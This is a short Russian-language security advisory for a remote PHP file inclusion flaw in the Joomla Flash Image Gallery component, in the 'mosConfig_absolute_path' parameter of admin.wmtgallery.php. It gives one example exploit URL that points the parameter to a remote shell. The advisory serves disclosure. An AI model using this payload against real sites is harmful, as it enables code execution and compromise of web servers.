Программа: Joomla Flash Image Gallery Component

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «mosConfig_absolute_path» сценарием admin.wmtgallery.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_absolute_path=shell?



Оставить мнение